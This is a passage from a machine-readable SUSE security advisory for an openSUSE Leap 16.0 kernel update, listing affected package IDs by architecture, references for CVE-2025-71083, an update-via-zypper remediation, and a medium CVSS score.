"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71083",
"url": "https://www.suse.com/security/cve/CVE-2025-71083"
},
{
"category": "external",
"summary": "SUSE Bug 1256610 for CVE-2025-71083",
"url": "https://bugzilla.suse.com/1256610"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
